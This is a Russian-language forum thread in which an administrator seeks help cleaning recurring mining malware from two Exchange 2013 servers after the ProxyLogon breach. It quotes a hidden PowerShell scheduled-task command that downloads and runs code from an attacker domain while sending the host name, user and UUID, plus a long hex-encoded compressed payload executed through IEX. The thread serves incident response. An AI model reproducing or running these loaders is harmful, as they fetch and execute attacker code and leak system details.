На обоих серверах запускается. Но мы так же смотрим про ПроксиЛогон уязвимость, и пытаемся исправить всякими скриптами повершела и т.п. Но зараза запускается снова и снова. Иногда, очень редко, запускается на одном из двух серверов, а на втором нет. У меня вообще подозрения что команда запуска идет из вне, т.е. доступ запуска всё еще остался некий доступ. Хоть мы и поставили все обновления, заплатки от майкрософта.
Очень правильно что посоветовали программу для слежки, конечно же сейчас сделаю. У меня как раз был этот вопрос.
Скрипты сделал на двух серверах.

[I]пришлите карантин этих файлов прислать в почту [/I][URL=mailto:[email protected]][I][email protected][/I][/URL][I] в архиве с паролем infected[/I]
Можете рассказать как это делать в малвербайте? Отчет нашел как отправить, а сам карантин не вижу где это делается в программе. На сайте нашел только это [URL=https://forum.esetnod32.ru/forum9/topic10688/]https://forum.esetnod32.ru/forum9/topic10688/[/URL]
Пока не скрипт не выполнял.
Сегодня снова майнингИ были. Сделал образ двух дисков. Отправляю.

В общем самодеятельность моего начальника привела к тому что, он самостоятельно, без моего ведома, запустил Малвербайт на этих серверах.
Правда это дало результат, сегодня всё в нормальном состоянии... Скинул на всякий случай отчет из него. Но зараза возможно что снова прилетит?

Эх!!! Только закрыл процесс на двух серверах, т.к. люди работать не могут, после прочитал... Запускается в 2:30 каждый день, как самостоятельно его запустить не знаю, завтра утром сделаю. Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут.

Здравствуйте.
Собственно снова вирусы на двух MS Exchange 2013. В скриншоте показал строку c бякой.
Файл WACS.EXE нормальный, используется для сертификатов ssl.
Помогите отыскать заразу.

[QUOTE]santy написал:
если будет возможность перегрузить сервера,
выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,
возможно получиться увидеть, кто  эти задачи создает.
(при условии, конечно, если они будут воссозданы)

  [/QUOTE]
твик 39 что то найти не могу, найду.
Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)

[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
[QUOTE] santy написал:
[QUOTE] Владимир Шариков написал:
Положу сюда сразу два образа двух серверов.[/QUOTE]
можно и второй образ положить[/QUOTE]
[/QUOTE]
по второму серверу:
это нормальный софт?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "[URL=HTTPS://ACME-V02.API.LETSENCRYPT.ORG/"]HTTPS://ACME-V02.API.LETSENCRYPT.ORG/&quot[/URL];[/QUOTE]
Да, это сертификаты обновляет.

[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
Положу сюда сразу два образа двух серверов.[/QUOTE]
можно и второй образ положить[/QUOTE]

[QUOTE]santy написал:
сервер можно будет перегрузить (скриптом)?[/QUOTE]
Через пол часа можно будет.
[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?[/QUOTE]
шифрованный код. понятно, что расшифровывается на вашей системе, или наоборот в зашифрованном виде уходит в сеть[/QUOTE]
Как его возможно расшифровать? Нужно понять что хакер хотел добиться. Как мы поняли хекер воспользовался уявимостью, при обращение к екчанджу происходит срабатывания нескольких скриптов (каких мы не знаем). Но заметили что меняются ДНСы сервера.
[QUOTE]santy написал:
есть задачи, через которые возможно пытаются перехватить пароли.
[QUOTE]C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
-W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))[/QUOTE]
[/QUOTE]
Вот это слово "Возможно" пугает ))) Тут как я понимаю срабатывает Имя ПК, Индефикатор, и имя пользователя.

Вот это не ясно [URL=http://t.netcatkit.com/a.jsp?_20210317][S]http://t.netcatkit.com/a.jsp?_20210317[/S][/URL][S]?[/S] :

Скрытый текст

I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('ad59f973db46acfed9fe2b588e12919548ebb21d3ba369555fd16b7c3cc­b49dab15c85225712235e5d52b6d5d8ff7b3f60495d71dbbc99a79b4b2c1­68be303b0f247c66d37caae32797778d8f3ff129a25fed4de985f4b7ebad­76a97323913cfdbdb257f34f4a3b6ee8f6c7ceb3c107abb6d5db4f65b07b­b9e531f366b43cfa98956a3f6e6c075f6466e6d7fb8d720d2a9e4b95359c­c9d4a9edb745b6e4decefbea9d7dcdac873446358abef3586adc648d45a4­e0da4108f0531bf6e6f6f9542e613eee57c30c07c5ab55a7de81cbc715a8­dd6c81bee356bad7da7d1744607fbc2dd3d203e201de793c7cbd9639eee1­c34eac3dd66c3dbf51acd03d1721a62bf2e76476f769bf5835dd7032d343­09a456ee6c79146938c92c712ddf6843b937e36b78fe43cc9e2b17492c9d­c3e3fde85368fa470326198f6511c26b34cbc73d2094d7c1ac5b8e34ebe9­6824abb34b06fe25e26fd686c941f1b65134b6d4991cd64a495828d95452­62327044bacade1519289934ddafad161ff931f79f143daefcdd34c84cd4­63190c40f42a6131104fd8f759b54c11305f149b5b636767d4d577cfa3fe­a9ad58ddc60e609ed475b3cc2174e1ed5e5920d8d2f7730b089118464ae1­954433ce90b6e75699ffa818026ae85e37582e097792652a3586d9da56e9­a8a49ceda50226a3ed4a0842d36cd2b618541fbfbd651d317fce9415ec5b­292af33af55e6f4282cc07397b7f28d16fbe5bb6deb4bec47c6ad3b71e4e­ddd9dd17a63dbbbfb95bd5ddb3ea8550ef66dbbde68984f6722b3ae1dd82­4d4aca37816659ab1573196a3e6ab3dd3d42a9aceda500bb87132b77cd87­361a20da52dc6f34d3ec5b3cc8a66011c27dfe70f0674915944b4496c22c­8d50ef40db6f9fe3694403020d584c21331123010544b01c522bef2d8d6a­bfcdadecee41c8eaed0e2bf0c26a2fbc32c4cfa0a6d20e0b3eb647033aca­cd870bc7f3717828b17982809bf9b0ba3d71a1bec1aa1150d663280b7eb9­32c4b0e777668c84eff0c229181d276e350e1d70f25d041d5f86c17b499a­da8a6be2224d5ba70fc9c25d1da6912f899a1efe8e66dcdb61b77ec66b8a­4e51321433f03a5b144a02b6088eb274e60e7a1bf18b8fb17a2ae27a20c7­7a000f8e2d14cc2c299619a7637ed46d77120fe6d855f667e9029b23b4de­f78a11ff969269d2c963ac20d5b0a93018731f6440a3dba3cbffa7073727­dd1393fc1fdf1ccf768137027eb21f4e3e117e1661a98371b831c34a502b­42b197b333733ed0f1fbac798193a2e4da4f0f914fa97ab132f44f610cb6­9c773124c3f8aa3913f9e412642d027ed6122a4d008b8fc04be3c0c84079­4fb5f6017253ad33e775cc7f3a4485310a722005f2b97cb1af932cdb43a9­68fd3e1b7cb5b6ee0609a92e21226c29ad158c94fda88096f69aa7d04d12­08e2d451238ae30f473df95711a8f780fa4598d82c7ace803bdc2333e223­c31035c66a990853a3ff416aa048238c0ca6f847a6069c810a4cc5409631­f33357183206c9e5bfa4e132782239cca383cf783c04f851b475e6adc623­15fc65108dfc0fd1bdf9d3284ada4b2819dc59913e433d89f1dc9c67dc94­61f7d4fc4304d26e32010d2e42cb2bd3d8613e414579379eabb4e702ec25­8ce618b575f4b613a0bc1b1f6ac7d056ad345058a18903a1d170eaa3dbf2­d85226cf3bd9dfad950453c6947faf7b44be35669c046d81fd358371ac5c­af5f93235cc351fe9a6840a73cd02446b06063af78e1f90d79c4a217a581­639720c9fa8355a664e4564ccec669ea86a4abfc626ee69960ea25832a70­d92dc6b81339b6c4e63193af02ea6ba39ed6df258bd7fdab9693608abb08­bc234447801f50246eed8a1d65687d910b1547d9844f06c2a9879d297705­762d7c89c3029cc798cba46b33ee42bebaf52ddb47bb361cea8563d80bb2­bcddf5e8b11c510797b274d45380c086adec78ef7c9cf26578ecc7c2720f­10c5d458afd490ced93c74c44e4f0e04c9133fc424b5f8807ab702310f55­ce92799dd13122cfcbf38c2edff71ee1d75a31827f73a16881a75a518184­6243e3f50647f26764063fb410cddcf810f17376d9dc03c80906a4bba51c­e81bbded8b76b78d60f5bcdbdbd839dfa0e5c2d74e4bc4cf54529bc6f93b­0f6fd225c433f5143888b2857849fd08d89543726280b0115640904902a2­6ca5514826b690b55610f9a3f4faea418c13d23f2bc633f25af828f0664a­3f338f201bd1098406aabe3791bf45ccd916057540eb887fdffa092b14b4­00842c00897972a7c96e5e515150e3d2e2fef515e6ed427aa8cf8ff5d212­f41508e2cf483246b28b8b1e08f2e0a9db39bdf9e2e3e768fbb9da7b393d­3cbeba313ae76fc346ad75f9c70ed0090a2a7cef9714ee8306109f65cc9c­53f2117d7ef28ff3ad209d3f6cf46e9bebacc72554e68554a4e7918bda66­cbd9dc270410c7129051585c54a5d9f66895142eb5014a10fc8b6c29a203­0351a26d3670814abd09645158b3261e8a93abd23c73342e7f7c8bf9abee­3f2c4cdc6c545d9ebc61ee40c21e528e216c6280b77126be50adfaa94dfe­69d5db98ca1d0abe09b86e0c5b9e018e9e3d62852b78a4a484d28aef8de4­6cb840830bfdee651fe7f6f9c68fa32dfa41bad13f54e8899b745cd9a3ec­3c8cbd2977600bb82c7a05d88f00fa51f9322912c3a0c9ef5967a061a03c­e2a0d815d14cf12f8092df5035fa825da402a800b9086c105d04ea076548­04b812d9e9339e807971adbc9d5fa13be9587911a214bb61484e5c85684f­876379fc87dd6b6433e1a99cf02e9794de85599d52e73e3f34e9fcbe6a24­2293f0192fef8e38fa7d5b1d76aec7519d0b7e66809f6354244544b1416b­99bc17410a65dc31a9a15c0b5b1205011658455c758a55d37bf924c18be2­df9779cd06a8f3544c510369f3e3fbff53f8b478303ab68b69818d531e8a­1266af057930454f28b1f019cc9be42aede5a2a8d7c8cca3d02e6b3bffc0­40e259c702dd92c895535a2480cd6ea2df654a99bb6cd82abfd9877a6595­5bdc52af795dfe7083558ea18d5921a3351719394ca66f59a7aa83d0ddaf­4691f057184a0a012672d18cb15bdcfdab601fd3a07de7ffa0458549975c­530ead4a0eebfd4a0420cd37c4b4154d7acab139eabd1b4ef778c8afec43­ea059da6b80950664a2a656db996baf20feaba5e46bd78469af374736e12­c19c28173ff22d82c773f9ffcf6ad7f984f0827a2ab9435abbc098930047­c35303572d2b26a1001d501852262b28d4f27156f57bce16602eb7b001df­b1cd8f4886844e7502d97cf8278e8047df17e657ab95cbd45debb5be3b9c­8ec4a18c6dd7a9b45d1f4ee08dbc4461e293e30ae8ec0787a77c491846c8­1ea10609e5310b6313a70d36c560c280627439c25a92851f96ee5148d663­58af56ecef92c6cb96203578b257197e76c2eda40fdcd6b528bcd4b3aeaf­7eac25b58b948b6c8bc5cb55266cd2bdc0d899a2b128dd7456a6e88347e5­1a626245030c9477d0ba9e8e205b1784eab58f457b9a6f6d68ada7f952fa­9bda5a9534cfafa27b573e1b6d1dce64da26acb507652d1efa85615bebad­2aaa2db0c30a82ddad436f919ea6cb42a173d14b7a8317bc291eee45212b­8fd6c94dfd8fc44f01dd8fc4451ba52c6e729a58daaa40272f495553afab­d634354b9b1ace67d24bea94100c2a14842b920c29c541d3c54a11a763ac­2deddfc6442376998dce2db5156d5c6308a65bc7d00114a612ccf9d6875d­96c54f59addd217851454ba08db5ef7e437f4801acc820e02504c47b1aa5­4bfa37a6d7b8beccc65f3d656890a7b4ebde821fe2531934b9546c817417­eae439cf40a8abe8a9eeb8edc52b1c5f70a63fb1d2798d4465237f40f50a­4d519631c4dfc7b648cc83a9eb9530bad3c5f0de86a09967dd8cbe2f6616­beb595b980bfc91180643065db4b9cbc5f4e3bc80401be6e840af5c66e6b­055a2191d299d3975f57922b8118f997d12c171494587879dde51b76b03f­1f3f269b99462b2450a5e72a2a0594a86171b405f1c59ed6033b1ccec2f6­94205afd290021d38f246b0475e5b8fee3d1bb9964fe1236fdc5e1eb7e1c­ed8466544b7368e2f8932ef7d295775e95c94c7ec404463105891d01a8d5­a73f7600f7f60d046d6bbbccd426ca1484a9250e4a214d377c017c65b1e0­2e29235b35a16204b864585c01d4f27419ba0ca7c935b6e3e20a0936ce64­2f56c327f872668f57831f270ee5eadef317b3e2810f9d6564816a8b5720­8599a4cd3b6feeed793df07ef2f8f3aef07e79da377dd8b937eeff2f4e65­3e7faa44f7fb58469dc5e1e2ff52f4723dfa54c5a7a203b7c8a1ff65acdc­605008da95d19e2df046c627a135fcfa2fef5c959b77773fd7b7fc11b4c1­e1ca9a8c92ad404e9240aad442aa39fe0bd7a899f7d62fde258414bf15d1­cfdb3b909b5790532e55a317f2dc674cc383f3c6402ba4f20eb4efcc0e3d­3f20d0238068cf1c4c73af9611e0e7716bd5fdfabe08f0f3e74b9a135b8b­3da60d12f0dfa97b32c88e3a9f9bce842f2bf01d2a998b771c8f34f33fa4­5b3b370eae53a3c192d27599f7c4b999e0695cdb9eba741347f005f1c72f­14d4d391ed591c1d98c3ad9866665749a748c8c42fe520a51b98cdb2be1a­3983e3fe70501dfe7859755cf394eb7bebfe4c92b1e2e7868e65ab143032­bd96799c0f906ef7733be0b871fc75e88b39a969d3d66b96ab672c429427­4c71f0d90a882e2bf3c56d5a2de7891eb74da9a4eed201e2b969b0ca1c99­cd9f3f6df'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

Что этот код делает? Стоит ли боятся "Последствий" этой бяки?